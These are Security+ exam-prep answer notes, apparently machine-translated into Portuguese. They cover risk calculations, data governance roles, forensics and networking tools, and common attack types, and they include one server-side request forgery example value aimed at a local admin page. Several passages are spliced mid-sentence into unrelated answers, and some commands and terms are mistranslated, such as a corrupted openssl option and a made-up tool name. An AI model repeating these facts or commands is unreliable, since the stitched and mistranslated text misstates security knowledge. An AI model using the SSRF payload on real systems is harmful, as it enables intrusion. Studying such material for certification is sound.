O RTO (Recovery Time Objective, objetivo de tempo de recuperação) é a quantidade de tempo dentro da qual um processo ou serviço deve ser restaurado após um desastre para atender à continuidade de negócios. Ele define quanto tempo demora para recuperar após a notificação de interrupção do processo. O objetivo do ponto de recuperação, ou RPO, especifica a quantidade de tempo que pode passar antes que a quantidade de dados perdidos possa exceder a tolerância máxima da organização.
Como calcular a expectativa de perda anual (ALE) que pode ocorrer devido a uma ameaça?
B. Expectativa de perda única (SLE) × taxa anual de ocorrência (ARO)
ALE (expectativa de perda anual) é o produto da ARO (taxa anual de ocorrência) e o
LES (expectativa de perda única) e é expressa matematicamente como ALE = ARO × LES.
A expectativa de perda única é o custo de qualquer perda única, e é matematicamente expressa como SLE = AV (valor do ativo) × FE (fator de exposição
Os benchmarks do Center for Internet Security (CIS) fornecem recomendações sobre como Proteja um sistema operacional, aplicativo ou outra tecnologia coberta. Michelle vai encontrar Diretrizes e técnicas de configuração de segurança específicas do Windows 10.
O tempo médio entre falhas (MTBF) é uma medida para mostrar o quão confiável um hardware componente é. MTTR (tempo médio para reparo) é o tempo médio que leva para um dispositivo com falha ou componente a ser reparado ou substituído.
A análise quantitativa de riscos requer cálculos complexos e é mais demorada porque requer dados e cálculos financeiros detalhados.
Um custodiante configura a proteção de dados com base em políticas de segurança.
Os proprietários de dados atribuem rótulos como ultrassecreto aos dados.
Custodiantes atribuem controles de segurança aos dados.
Um responsável pela privacidade garante que as empresas cumprem as leis e regulamentos de privacidade.
Os administradores de sistemas são responsáveis pelo funcionamento geral dos sistemas de TI.
O Regulamento Geral sobre a Proteção de Dados (RGPD) não inclui o direito ao anonimato, embora as organizações devam ser capazes de fornecer salvaguardas de segurança que podem incluir anonimização, quando apropriado.
O processo do NIST RMF é.
1. Preparar
2. Categorizar o sistema
3. Selecione os controles
4. Implementar controles
5. Avaliar os controles
6. Autorizar sistema
7. Controle do monitor
Os administradores de programas de segurança geralmente usam diferentes tipos de treinamento para garantir que os formandos que reagem e respondem de forma diferente à formação recebem formação que os ajuda.
Os riscos que a própria organização cria são riscos internos.
Os riscos externos são aqueles criados por fatores fora do controle da organização.
Qualitativo e quantitativo são ambos os tipos de avaliação de risco, em vez de categorizações de.
O tempo médio de reparo (MTTR) para um sistema ou dispositivos é o tempo médio que ele levar para repará-lo se ele falhar. O MTTR é usado como parte do planejamento de continuidade de negócios para determinar se um sistema precisa de redundância adicional ou outras opções colocadas em prática se uma falha e o reparo excederia a interrupção máxima tolerável.
Não há nível de classificação civil para dados do governo. Os dados podem não ser classificados, ou sensível, mas não classificado. Top Secret, Secret e Confidential sãotodos comumente usados Classificações.
A Federal Trade Commission (FTC) não fornece guias de configuração de segurança ou benchmarks para sistemas operacionais ou dispositivos. O Center for Internet Security (CIS), a Microsoft (e outros fornecedores) e a Agência de Segurança Nacional (NSA) fornecem configuração Benchmarks.
Mapas de calor de risco ou uma matriz de risco podem permitir que uma organização analise rapidamente os riscos e compare-os com base em sua probabilidade e impacto ou outros elementos de classificação. Qualitativo e as avaliações quantitativas de risco são tipos de avaliação, não meios de apresentar risco informações em um formato fácil de entender, e gráficos de risco não são um termo comum usado em o campo.
. As multas que podem resultar de violação ou infração de regulamentos como o Geral O Regulamento de Proteção de Dados pode ter um impacto significativo em uma organização, ou pode até mesmo potencialmente tirá-lo do negócio. Devido a isso, as organizações rastrearão o cumprimento das regulamentações como parte de sua postura de risco.
A recuperação de desastres requer reflexão e preparação, resposta a problemas para minimizar impacto durante um desastre e atividades de resposta após um desastre. Assim, um desastre completo O plano de recuperação deve incluir ações que podem ou ocorrerão antes, durante e depois de um desastre, e não apenas o processo de recuperação após o fato.
Embora as violações de dados possam resultar na rescisão de um contrato de processamento de cartão, o O fato de sua organização não estar em conformidade é mais provável que resulte em uma multa. PCI-DSS, ou Padrão de Segurança de Dados da Indústria de Cartões de Pagamento, é um padrão de fornecedor, não uma lei, e criminoso As acusações normalmente não seriam apresentadas em uma situação como essa.
Embora a recuperação de uma violação possa custar caro, a perda de dados como propriedade intelectual em circunstâncias como estas é a questão mais crítica. É provável que a instituição sofra danos reputacionais e pode não ser confiável para conduzir pesquisas como essa no futuro, levando a um custo ainda maior para a capacidade da universidade de fazer novas pesquisas com o governo.
As funções essenciais à missão são definidas como aquelas funções que uma organização deve executar durante uma catástrofe ou que deve ser retomada o mais rapidamente possível depois de uma, se não puderem ser sustentado. Eles são as funções centrais da organização e são a chave para o seu sucesso e existência contínua.
Um SLA (contrato de nível de serviço) define o nível de serviço que o cliente espera do fornecedor de serviços. As definições de nível de serviço devem ser específicas e mensuráveis em cada área. Um MOU (memorando de entendimento) é um documento legal que descreve uma mútua acordo entre as partes. Um ISA (contrato de segurança de interconexão) é um acordo que Especifica os requisitos técnicos e de segurança da interconexão entre organizações. Um BPA (acordo de parceria comercial).
O roubo de informações proprietárias, como uma fórmula ou código, é um exemplo de roubo de propriedade (IP). O roubo de IP pode ser mais difícil de quantificar o custo de uma perda em muitos casos, mas pode têm impacto significativo para uma organização que depende do IP para seus negócios.
Este é um exemplo de uma política de credencial de pessoal, uma vez que se aplica à equipe que é empregado por sua organização. Políticas como essa ajudam a garantir que as contas não sejam compartilhadas ou Reutilizado. Não há menção a dispositivos, contas de serviço ou contas administrativas específicas.
A probabilidade de ocorrência, ou probabilidade, é multiplicada pelo impacto para determinar um O risco é severo.
Uma análise de impacto nos negócios (BIA) ajuda a identificar sistemas críticos, determinando quais sistemas criarão o maior impacto se não estiverem disponíveis. MTBF é a média tempo entre falhas, um RTO é um objetivo de tempo de recuperação .
Sean está conduzindo uma avaliação de risco do local que o ajudará a entender e se comunicar os riscos que o próprio site tem. Se o local estiver em uma planície de inundação identificada pela FEMA, ou se houver são preocupações com tornados ou outros desastres naturais, que precisam ser levados em conta à medida que a organização toma suas decisões sobre o local. Uma BIA identifica a missão crítica funções e os sistemas que as suportam. Prevenção da criminalidade através do ambiente design é um conceito de design que usa s a concepção de instalações para reduzir a probabilidade de criminalidade ações através do uso de iluminação e outros controles. O planejamento de continuidade de negócios se concentra em: Como manter uma organização operando apesar das interrupções.
. O contrato SOC 2 avalia os controles de segurança e privacidade que estão em vigor, e um O relatório de tipo 2 fornece informações sobre a avaliação do auditor sobre a eficácia do controles que estão em vigor. Um relatório SOC 1 avalia os controles que afetam a precisão de relatórios financeiros. O tipo 1 relata a opinião de um auditor revisor da descrição fornecida por gestão sobre a adequação dos controles conforme projetado. Eles não olham para o real Eficácia operacional do contrato
O risco inerente é o risco que uma organização enfrenta antes que os controles sejam implementados. Sem avaliação de riscos e controles em vigor, Gary deve primeiro lidar com os riscos inerentes a organização tem como existe hoje. cope é o risco que é deixado depois que os controles são colocar no lugar. O roubo de propriedade intelectual (IP) como algoritmos, fórmulas e processos são riscos de PI, e risco multipartido é o risco que afeta mais de um grupo, empresa ou pessoa.
A expectativa de perda única (SLE) descreve o que um único evento de risco provavelmente custará. Pois é calculado usando o valor do ativo (AV) vezes o fator de exposição (FE), que é uma estimativa percentual do custo que ocorrerá em dano caso ocorra a perda. MTTR é o tempo médio para restaurar, ARO é a taxa anual de ocorrência, e RTO é o objetivo de tempo de recuperação. Estes não fazem parte da equação do LES.
As políticas de credenciais de terceiros abordam como as credenciais de contratados e consultores são Tratado. Isso pode exigir patrocínio de um membro da equipe interna, controles adicionais em relação a redefinições ou alterações de senhas, e vida útil mais curta, entre outros controles e Requisitos.
Os processadores de dados são provedores de serviços que processam dados para controladores de dados. Um dado Controlador ou custcontrol de dados é a organização ou indivíduo que coleta e controla dados. Um administrador de dados realiza a intenção do controlador de dados e é delegada a responsabilidade para os dados. Os guardiões de dados são aqueles a quem são confiados os dados para armazenar, gerenciar ou Proteja os dados.
A arquitetura de referência da Cloud Security Alliance inclui informações sobre ferramentas de forma neutra em relação ao fornecedor. O CIS fornece benchmarks específicos do fornecedor para AWS, Azure e Ofertas de nuvem da Oracle. A Organização Internacional de Normalização (ISO) e o O National Kirk atenuou o risco para sua organização, aumentando os recursos visados por
o ataque DoS na tentativa de garantir que o ataque não será bem-sucedido. Aceitação envolveria simplesmente deixar os ataques ocorrerem sabendo que eles provavelmente pararão, evitando pode envolver encontrar uma maneira de garantir que os ataques não possam ocorrer, e a transferência pode alavancar um serviço de hospedagem espelhado ou anti-DoS de terceiros.Institute of Standards and Technology (NIST) não oferece esse tipo de recurso.
Um risco multipartidário envolve várias organizações. Uma vez que há vários clientes e organizações envolvidas, este é um exemplo de risco multipartidário. Origina-se um risco interno dentro de uma organização — em vez disso, esse é um risco externo. Um risco de sistema herdado é criado por um sistema ou processo que não é mais suportado oucomo o comando e o controle da botnet funciona, e que a porta padrão do IRC é TCP 6667. Embora este possa ser um dos outros respostas, a resposta mais provável dada a informação disponível é uma botnet que usa Internet Relay Chat (IRC) como seu canal de comando e controle.
As atualizações de software para roteadores sem fio de nível de consumidor são normalmente aplicadas como firmware e Susan deve recomendar que o proprietário da empresa atualize regularmente seus firmware do roteador sem fio. Se as atualizações não estiverem disponíveis, talvez seja necessário comprar um novo roteador que continuará a receber atualizações e configurá-lo adequadamente.
Os sistemas não devem ter um rootkit neles quando um teste de penetração é iniciado, e os rootkits instalados durante o teste devem ser totalmente removidos e excluídos com segurança.
Este é um exemplo de um ataque de dicionário de força bruta online. Uso de ataques de dicionário senhas comuns, bem como substituições comuns para tentar invadir um sistema ou serviço. Algoritmos de recuo que bloqueiam invasores após um pequeno número de tentativas de senha incorretas podem ajudar a retardar ou parar ataques de dicionário e outras senhas de força bruta Ataques. Tabelas arco-íris são tabelas de hashes pré-computados. O ataque de aniversário é um método para gerar colisões de hashes.
Jim descobriu um skimmer, um dispositivo usado para ataques de skimming que capturam crédito e informações de cartão de débito. Os skimmers podem ser capazes de carregar as informações sem fio eles capturam, ou podem exigir que os invasores recuperem dados pessoalmente. Alguns skimmers incluem câmeras para capturar pressionamentos de tecla para PINs e outros dados. Um ataque de repetição seria reutilizado credenciais ou outras informações para agir como um usuário legítimo, uma condição de corrida ocorre quando O tempo de uso e o tempo de verificação dos dados podem ser explorado, e um clonador de cartão seria usado depois que os cartões foram desnatados para duplicá-los.
As barras de ferramentas do navegador às vezes são exemplos de PUPs ou programas potencialmente indesejados .
OSINT, ou inteligência de código aberto, é uma informação de inteligência obtida do público fontes como mecanismos de pesquisa, sites, registradores de nomes de domínio e uma série de outros Locais. OPSEC, ou segurança operacional, refere-se a hábitos como não divulgar informações desnecessárias. STIX é o protocolo Structured Threat Intelligence Exchange.
Embora as consultas SQL (Structured Query Language) sejam frequentemente parametrizadas, as práticas de segurança do LDAP (Lightweight Directory Access Protocol) se concentram na entrada do usuário validação e filtragem de saída para garantir que uma quantidade excessiva de dados não está sendo retornou em consultas. Como acontece com todos os serviços, a configuração segura de serviços LDAP é uma das primeiras proteções que devem ser implementadas.
. O redirecionamento de URL tem muitos usos legítimos, desde o redirecionamento de tráfego de links sem suporte para substituições atuais até o encurtamento de URL, mas o redirecionamento de URL era comumente usado para ataques de phishing. Os navegadores modernos exibem a URL completa e real, ajudando a limitar o impacto desse tipo de ataque. O controle de expiração de certificado é usado para garantir que Os certificados de site são atuais, mas não impedem ataques de redirecionamento de URL. Javascript Ativar ou desativar cookies não é Helpfu como spyware ou adware.
As vulnerabilidades nos serviços de nuvem exigem trabalho por parte do provedor de serviços de nuvem para remediá-los. Você mesmo pode corrigir a maioria das vulnerabilidades em sua própria infraestrutura sem terceiros. As vulnerabilidades nos serviços de nuvem e na infraestrutura local podem ser tão grave e levar tanto tempo para remediar. Independentemente de onde sua organização armazena seus dados, sua responsabilidade por eles é provavelmente a mesma
C. Os roteadores sem fio do consumidor fornecem acesso administrativo local por meio de suas credenciais padrão. Embora eles recomendem que você altere a senha (e, às vezes, o nome de usuário para maior segurança), muitas instalações resultam em uma conta administrativa não segura. As outras respostas são todas questões comuns, mas não o que está descrito na pergunta.
Os ataques de travessia de diretório tentam explorar ferramentas que podem ler diretórios e arquivos por movendo-se pela estrutura de diretórios. O exemplo tentaria ler o config.txt três camadas acima do diretório de trabalho do próprio aplicativo Web. Adicionando comum nomes de diretório ou nomes de arquivos comuns podem permitir que invasores (ou testadores de penetração) leiam outros arquivos em diretórios acessíveis se eles não estiverem devidamente protegidos.
Os serviços de orquestração, automação e resposta de segurança (SOAR) são projetados para Integre-se a uma gama mais ampla de aplicativos internos e externos. Ambas as seguranças o gerenciamento de informações e eventos (SIEM) e os sistemas SOAR normalmente incluem ameaças e ferramentas de gerenciamento de vulnerabilidades, bem como recursos de automação de operações de segurança.
O arquivo SAM (Gerenciador de Contas de Segurança do Windows) e o arquivo /etc/shadow para Os sistemas Linux contêm senhas e são alvos populares para a força bruta offline Ataques.
Um ataque de remoção de SSL exige que os invasores convençam uma vítima a enviar tráfego eles via HTTP enquanto continuam a enviar tráfego criptografado HTTPS para o servidor legítimo fingindo ser a vítima. Este não é um ataque de força bruta, um ataque de cavalo de Tróia seria exigem malware, e um ataque de downgrade tentaria mover a sessão criptografada para um nível menor protocolo de criptografia segura.
O programa U.S. Trusted Foundry destina-se a prevenir ataques à cadeia de suprimentos por garantindo a segurança da cadeia de suprimentos de ponta a ponta para circuitos integrados e eletrônicos importantes.
Mapas de ameaças como os encontrados em threatmap.fortiguard.com e threatmap.checkpoint.com são visualizações de dados em tempo real ou quase em tempo real coletados por fornecedores e outras organizações que podem ajudar a visualizar as principais ameaças e ajudar na análise de eles. Os gráficos de pizza podem ser feitos em tempo real por meio de informações de segurança e gerenciamento de eventos (SIEM) ou outros sistemas, mas observe que nenhum SIEM ou outro dispositivo foi mencionado.
Bluesnarfing envolve o acesso a dados de um dispositivo Bluetooth quando ele está no alcance. Bluejacking envolve o envio de mensagens não solicitadas para dispositivos Bluetooth quando eles estão no alcance. Os ataques de gêmeos malignos usam um ponto de acesso desonesto cujo nome é semelhante ou idêntico ao de um ponto de acesso legítimo. Um RAT é um cavalo de Tróia de acesso remoto e nada nesse cenário aponta a um RAT sendo a causa dos dados roubados.
De acordo com o conselho nacional de ISACs, centros de compartilhamento e análise de informações, "Os Centros de Análise e Compartilhamento de Informações (ISACs) ajudam os proprietários de infraestruturas críticas e os operadores protegem suas instalações, pessoal e clientes de forma cibernética e física ameaças à segurança e outros perigos. ISACs coletam, analisam e disseminam ações acionáveis informações sobre ameaças para seus membros e fornecer aos membros ferramentas para mitigar riscos e aumentar a resiliência." IRTs são equipes de resposta a incidentes, Feedburner é o feed RSS do Google ferramenta de gerenciamento e feeds de ameaças verticais não é um termo do setor.
A porta TCP 23 é normalmente associada ao Telnet, um protocolo de shell remoto não criptografado. Como o Telnet envia sua autenticação e outro tráfego de forma clara (texto não criptografado/sem formatação), ele deve não ser usado, e Lucca deve identificar isso como um problema de configuração envolvendo um inseguro protocolo.
. Embora a contratação de especialistas no domínio seja frequentementeatualizado. Um roubo de propriedade intelectual (IP) O limiarimpleme ocorre quando informações proprietárias ou segredos comerciais podem ser expostos ou perdidos.
EOL, ou fim de vida útil, ocorre quando um serviço ou sistema não é mais suportado, disponível, ou não funciona. Natasha precisa se planejar para fazer uma transição suave para longe do serviço, seja para um serviço de substituição ou para parar de usar o próprio serviço. Um memorando de entendimento é um memorando de entendimento, e um NDA é um acordo de confidencialidade, nenhum dos quais é diretamente relevante aqui.
. O Center for Internet Security (CIS) fornece uma ampla gama de sistemas operacionais, aplicativos, servidores, e outros benchmarks. A Microsoft fornece benchmarks para seus próprios sistemas operacionais, mas não fornece benchmarks do Linux. O Instituto Nacional de Padrões e Tecnologia (NIST) não fornece referências, mas a Agência de Segurança Nacional (NSA) fornece.
Público, privado, sensível, confidencial, crítico e proprietário são todos comuns usou rótulos de classificação de dados para empresas. Segredo, no entanto, é mais comumente usado em sistemas de classificação do governo.
Os avisos de privacidade são frequentemente fornecidos como parte de termos de licença ou contratuais, bem como em contratos de uso do site.
1. Comandos Linux:
cd: Permite acessar um diretório (mudar de pasta).
2. ls: Lista os arquivos e diretórios no diretório atual.
3. pwd: Mostra o caminho completo da pasta atual.
4. mkdir: Cria um novo diretório.cite
5. touch: Cria um arquivo vazio.
6. cp: Copia arquivos ou diretórios.
7. mv: Move um arquivo ou diretório.
8. cat: Concatena e exibe arquivos.
9. grep busca por padrões em arquivos de texto.
10. Chmod: Altera as permissões de acesso a arquivos/diretórios
11. Logger: Adicionar mensagens ao arquivo /var/log/syslogencorajada, é necessário que terceiros analisem algoritmos proprietários não é. Muitos algoritmos de aprendizado de máquina são sensíveis, pois fazem parte da vantagem competitiva de uma organização. Garantir que os dados estejam seguros e qualidade suficiente, garantindo um ambiente de desenvolvimento seguro e exigindo controle de mudanças são todas práticas comuns de segurança de inteligência artificial (IA)/aprendizado de máquina (ML).
Os privilégios do Linux podem ser definidos numericamente, e o 777 define usuário, grupo e mundo para todos acesso de leitura, gravação e execução a todo o diretório /etc. Definindo permissões como esta é uma solução alternativa comum quando as permissões não estão funcionando, mas podem expor dados ou fazer binários executáveis por usuários que não devem ter acesso a eles. Quando você define permissões Para um sistema, lembre-se de defini-los de acordo com a regra de privilégio mínimo: somente as permissões necessárias para a função ou tarefa devem ser configuradas.
Footprinting é o processo de coleta de informações sobre um sistema de computador ou rede, e pode envolver técnicas ativas e passivas. Mapeamento, impressão digital e agregação não são os termos corretos ou comuns para essa prática.
Quando os modems dial-up estavam em uso intenso, os hackers realizavam exercícios de discagem de guerra para ligar para muitos números de telefone para encontrar modems que atenderiam. Quando redes sem fio tornou-se a norma, o mesmo tipo de linguagem foi usado, levando a termos como andar de guerra, condução de guerra, e até mesmo voo de guerra. O resto das opções foram inventadas, mas você deve Lembre-se de que o exame Security+ espera que você saiba sobre direção de guerra e voo de guerra.
Um falso negativo ocorre com um sistema de varredura de vulnerabilidade quando uma varredura é executada e um problema que existe não é identificado. Isso pode ser devido a uma opção de configuração, um firewall, ou outra configuração de segurança ou porque o mecanismo de varredura de vulnerabilidade não consegue detectar a questão. Uma atualização de vulnerabilidade ausente pode ser uma preocupação se o problema não indicar especificamente que as definições estão totalmente atualizadas.
A refatoração de um programa por meios automatizados pode incluir a adição de texto, comentários ou operações não funcionais adicionais para fazer com que o programa tenha uma assinatura diferente sem mudando suas operações. Isso normalmente não é uma operação manual devido ao fato de que as ferramentas antimalware podem encontrar rapidamente novas versões. Em vez disso, a refatoração é feita por meio de um polimórfico ou técnica de mutação de código que altera o malware toda vez que ele é instalado para ajudar a evitar sistemas baseados em assinaturas.
CheckinstockAPI=http://localhost/admin.php : Esta é uma tentativa de fazer com que o servidor envie uma solicitação para si mesmo como parte de uma chamada de API, e ele é um exemplo de falsificação de solicitação do lado do servidor. Um ataque de script entre sites usaria o navegador da vítima em vez de uma solicitação do lado do servidor, como faria um ataque CSRF
As senhas na memória geralmente são armazenadas em texto sem formatação para uso. Isso significa que os atacantes pode recuperá-los se eles podem acessar a memória onde a senha está armazenada, mesmo se o O armazenamento é efêmero.
A fase de reconhecimento de um teste de penetração envolve a coleta de informações sobre o destino, incluindo informações de domínio, informações do sistema e detalhes sobre funcionários, como números de telefone, nomes e endereços de e-mail.
O serviço AIS usa STIX e TAXII. STIX e TAXII são padrões abertos que o Departamento de Segurança Interna iniciou o desenvolvimento e usos para este tipo de esforço. fornece um compartilhamento automatizado de indicadores (AIS) serviço que permite ao governo federal e às organizações do setor privado Compartilhe dados de ameaças em tempo real.
As revisões de configuração, usando ferramentas automatizadas ou validação manual, podem ser uma maneira proativa útil de garantir que portas e serviços desnecessários não estejam acessíveis. As ferramentas de gerenciamento de configuração também podem ajudar a garantir que as configurações esperadas estejam em vigor. Nem a captura de pacotes de rede passiva nem ativa mostrará serviços que não são acessados, o que significa que as portas abertas podem ser perdidas, e a revisão de log também não mostrará todas as portas abertas.
Clickjacking envolve enganar os usuários para que cliquem em algo diferente do que pretendiam.
Operations and incident response:
route é uma ferramenta de linha de comando para exibir e adicionar rotas de tráfego de rede.
hping é um gerador e analisador de pacotes, e netstat é uma ferramenta de linha de comando que mostra conexões de rede, estatísticas de interface e outras informações úteis sobre o uso da rede de um sistema.
O CentOS e a Red Hat armazenam informações de log de autenticação em /var/log/secure.
Títulos de páginas da Web, bem como cabeçalhos como metatags, são exemplos de metadados sobre uma página e são frequentemente usados para coletar informações sobre páginas da web e sites.
Os cabeçalhos são usado como parte do design de uma página e normalmente descreve a barra na parte superior da página usada para navegação no site.
Resumo e dados ocultos não são termos técnicos usados para descrever páginas da Web Componentes.
ExifTool é a única ferramenta de recuperação de metadados de arquivo criada especificamente listada.
FTK Imager é uma ferramenta gratuita que pode obter imagens de sistemas e memória.
Os registros MX de um domínio listam seus servidores de email. Gary pode usar nslookup para consultar DNS (Sistema de Nomes de Domínio) para os servidores MX usando o comando nslookup -query =mx example.com procurar o servidor de e-mail do example.com
O Wireshark pode ser usado para capturar e analisar o tráfego SIP (Session Initiation Protocol) ao vivo em uma rede. Wireshark é um analisador de pacotes que pode ser usado para capturar e analisar o tráfego de rede para fins forenses.
Greg acredita que um invasor está usando um ataque de senha de força bruta contra um Linux sistema pelo qual ele é responsável. Que comando ele poderia usar para determinar se esse é o caso?
A. grep "Failed password" /var/log/auth.log
Ao contrário da análise forense de disco, a forense de rede requer uma visão prévia e captura intencional de dados antes que eles sejam necessários, uma vez que o tráfego é efêmero. Organizações que desejam para ter uma visão do tráfego de rede sem capturar todo o tráfego pode usar o NetFlow ou o sFlow para forneça algumas informações sobre padrões de tráfego de rede e uso.
O mapeamento de redes usando ping depende do ping de cada host e, em seguida, usa o tempo de vida
(TTL) para determinar quantos saltos existem entre hosts e dispositivos conhecidos dentro de uma rede. Quando os TTLs diminuem, normalmente existe outro roteador ou switch entre você e o dispositivo.
Os pacotes enviados e recebidos podem ser usados para determinar se há problemas com o caminho ou link, e o tempo de trânsito pode fornecer informações sobre a distância relativa da rede ou o caminho usado, mas traceroute fornece muito mais detalhes úteis nesse caso.
As tabelas CAM (Content-Addressable Memory) nos switches contêm uma lista de todos os dispositivos com os quais eles conversaram e darão a Erin a melhor chance de identificar os dispositivos em a rede.
Wireshark e netstat só terão uma visão dos dispositivos que o sistema ela está trabalhando a partir de comunicação com ou que transmite no segmento de rede em que está.
O DNS (Sistema de Nomes de Domínio) listará apenas os sistemas que têm uma entrada DNS. Na maioria das organizações, relativamente poucos sistemas terão entradas no DNS.
sistema de gerenciamento de dispositivo móvel (MDM) para garantir que os dispositivos organizacionais podem ser gerenciados e protegidos no futuro.
Uma cadeia de custódiabem documentada pode ajudar a estabelecer a procedência dos dados, comprovando de onde veio, quem o manipulou e como foi obtido.
O arquivo de permuta do Windows é pagefile.sys e é salvo na raiz da unidade C: por padrão.
D. Degaussing(DESCALIBRAR) uma unidade usa campos magnéticos fortes para limpá-la e é o menos provável de resultar em dados recuperáveis. Arquivos excluídos muitas vezes podem ser recuperados porque apenas as informações de índice de arquivo será removido até que esse espaço seja necessário e seja substituído. Formatos rápidos funcionam de maneira semelhante e deixarão dados remanescentes, e arquivos que são substituídos por arquivos menores também deixar fragmentos de dados que podem ser recuperados e analisados.
O uso mais provável de Henry para o vídeo é documentar o processo forense, parte da cadeia de custódia e procedência dos dados forenses que adquiriu.
WinHex é o único editor de disco nesta lista. A autópsia é um conjunto de análises forenses; dd e FTK Imager são ambas as ferramentas de imagem. WinHex também fornece a capacidade de ler RAID e discos dinâmicos, executar recuperação de dados, editar memória física, clonar discos, limpar arquivos e unidades e uma variedade de outras funções.
Os manuais listam as etapas necessárias para resolver um incidente. Um runbook Concentra-se nas etapas para executar uma ação ou processo como parte de um processo de resposta a incidentes. Assim, uma cartilha pode referenciar runbooks. Planos de continuidade de negócios (BC) e desastres os planos de recuperação (DR) não são usados para resposta a incidentes, mas são usados para garantir que um As empresas permanecem on-line ou podem se recuperar de um desastre.
Uma falha do sistema, ou despejo do sistema, arquivo contém o conteúdo da memória no momento do colisão. A infame tela azul do Windows da morte resulta em um despejo de memória para um arquivo, permitindo a análise do conteúdo da memória. O arquivo de permuta (arquivo de paginação) é usado para armazenar informações que não caberia na memória, mas é improvável que contenha um pacote de malware em execução no momento, já que os arquivos são trocados quando não estão em uso.
O comando tracert do Windows também mostrará a rota para um sistema remoto como atrasos ao longo do percurso. traceroute é o comando equivalente no Linux. O arppermite que você exiba e modifique o cache ARP (Address Resolution Protocol) em Windows e netstat tem funções variadas em diferentes sistemas operacionais, mas geralmente mostra estatísticas e informações sobre o uso e o status da rede.
O comando @ para dig seleciona o servidor DNS (Sistema de Nomes de Domínio) que ele deve consultar. Nesse caso, ele consultará um dos servidores DNS do Google na versão 8.8.8.8 para obter as informações de DNS para example.com.
Greg deve usar as funções de hash internas para comparar um hash MD5 ou SHA-1 da unidade de origem para um hash usando a mesma função executada na imagem. Se combinarem, ele tem uma imagem válida e intacta.
O comando grep do Linux é uma ferramenta de busca que Adam pode usar para pesquisar arquivos ou diretórios para localizar cadeias de caracteres. cat é a abreviação de concatenar, e o comando pode ser usado para criar arquivos, exibir seu conteúdo ou combinar arquivos. cabeça e cauda são usadas para visualizar o início ou fim de um arquivo, respectivamente.
Ao contrário de um plano de recuperação de desastres que é escrito para ajudar a recuperação de uma organização de um desastre natural ou causado por uma pessoa, um plano de continuidade de negócios se concentra em como manter o negócios funcionando quando são interrompidos. Assim, o plano de Charlene detalharia como manter o organização em execução quando ocorre uma interrupção do sistema.
OpenSSL pode ser usado para gerar um certificado usando um comando como este:
openssl req -x509 -sha256 -nodes -dias 365 -newkey rsa:2048 -keyout
privateKey.key -out certificate.crt.
O único cracker de senhas listado é John, o Estripador. John aceita listas de palavras personalizadas, o que significa que Cameron pode criar e usar sua própria lista de palavras, como mostrado na opção A
A autópsia não tem uma capacidade interna para criar imagens de disco. Em vez disso, ele depende de ferramentas de terceiros para aquisição e, em seguida, importa imagens de disco e outras mídias. Autópsia tem geração de linha do tempo integrada, filtragem e identificação de imagens e comunicação visualização, entre muitos outros recursos.
Metasploit é uma estrutura de exploração Ferramentas como Metasploit, BeEF e Pacu são exemplos de estruturas de exploração.
O pathping combina a funcionalidade de estilo ping e tracert/traceroute para ajudar Identifique o caminho usado e onde a latência é um problema. Ele é construído no Windows e pode ser usado exatamente para a solução de problemas que Frank precisa realizar. Ele poderia usar os dois ping e tracert/traceroute para executar a tarefa, mas ele precisaria gastar mais tempo usando cada ferramenta, por sua vez, para identificar as mesmas informações que o pathping colocará em um interface única.
A ferramenta dnsenum pode executar muitas funções relacionadas ao Sistema de Nomes de Domínio (DNS), incluindo a consulta de registros A, servidores de nomes e registros MX, bem como a zona de execução transferências, pesquisas no Google por hosts e subdomínios e pesquisas inversas de intervalo de rede.
Jill quer que o mínimo possível de mudanças ocorram no sistema, então ela deve instruir o usuário para não salvar nenhum arquivo ou fazer alterações. Reinicializar o sistema não criará uma memória dump e pode fazer com que novos arquivos sejam gravados ou alterados se os patches estiverem aguardando para instalar ou outras alterações são definidas para ocorrer durante uma reinicialização. Desativar a exclusão segura ou fazer outros As alterações não afetarão os arquivos que foram excluídos antes dessa alteração de configuração.
As atividades antiforenses seguem o movimento lateral no modelo Cyber Kill Chain. Isso ajuda para lembrar que, depois que um invasor concluir seu ataque, ele tentará se esconder vestígios de seus esforços, e então pode proceder a atividades de negação de serviço ou exfiltração em O modelo.
.A formatação rápida simplesmente exclui índices de arquivos em vez de remover e substituir arquivos, tornando-o impróprio para higienização. A destruição física garantirá que os dados não sejam legível, assim como a descalibragem e a limpeza zero.
O Microsoft Office coloca informações como o nome do criador do arquivo, editores,
datas de criação e alteração e outras informações úteis nos metadados do arquivo armazenados em
cada documento do Office. Bart pode simplesmente abrir o documento do Office para revisar essas informações ou pode usar uma ferramenta forense ou de metadados de arquivo para revisá-lo. Os nomes de arquivos podem conter nome, mas isso só seria se o criador o incluísse. O Microsoft Office não cria ou manter um log e o aplicativo.
O Firewall do Windows Defender opera em um modelo por aplicativo e pode filtrar o tráfego com base em se o sistema está em uma rede privada confiável ou em uma rede pública. Nathaniel deve permitir o Chrome pelo nome no firewall, o que permitirá que ele envie tráfego sem necessidade de especificar portas ou protocolos.
O script Perl dnsenum cria alguns recursos de enumeração DNS (Sistema de Nomes de Domínio), incluindo host, servidor de nomes e coleta de registros MX; transferência de zona; Google scraping para domínios; força bruta de subdomínio de arquivos; bem como automação Whois e pesquisas reversas para redes de até classe C em tamanho. Embora você pudesse manualmente Use dig ou ifconfikup ou mesmo netcat para executar muitas dessas funções, dnsenum é a única ferramenta automatizada da lista.
A construção de uma linha do tempo, especialmente a partir de vários sistemas, depende de um sistema definido com precisão relógios ou adicionar um deslocamento configurado manualmente.
Os cabeçalhos de e-mail contêm uma quantidade significativade metadados, incluindo onde o e-mail estava enviado de. O campo de: lista um remetente, mas não indica onde o e-mail estava realmente enviado de. O campo para: lista para quem o email foi enviado e os rodapés não são usados para armazenar isso informações para e-mail.
. Existem fronteiras jurisdicionais entre estados e localidades, bem como países, fazendo com que É um desafio para a aplicação da lei local executar mandados e adquirir dados de organizações fora de sua jurisdição em muitos casos. Local é usado para descrever onde um legal caso é conduzido. A legislação pode ou não ter um impacto, e as leis de violação são improváveis para impactar isso, mas orientaria Henry sobre quando as notificações de uma violação precisariam acontecer.
Olívia deve usar João, o Estripador. Embora tanto João Estripador e mesa arco-íris ferramentas como Ophcrack pode ser usado para quebrar senhas, John the Ripper vai fornecer um melhor Vista de quão difícil foi a senha para quebrar, enquanto as ferramentas de tabela arco-íris simplesmente Determine se o hash da senha pode ser quebrado.
A Agência Federal de Gestão de Emergências (FEMA), parte do Departamento de Segurança Interna, é responsável pelo Planejamento de Continuidade de Operações (COOP), que é um exigência para órgãos federais. O Departamento de Agricultura dos EUA (USDA), o A Agência de Segurança (NSA) e o Federal Bureau of Investigations (FBI) não são responsáveis por Continuidade do Planejamento de Operações.
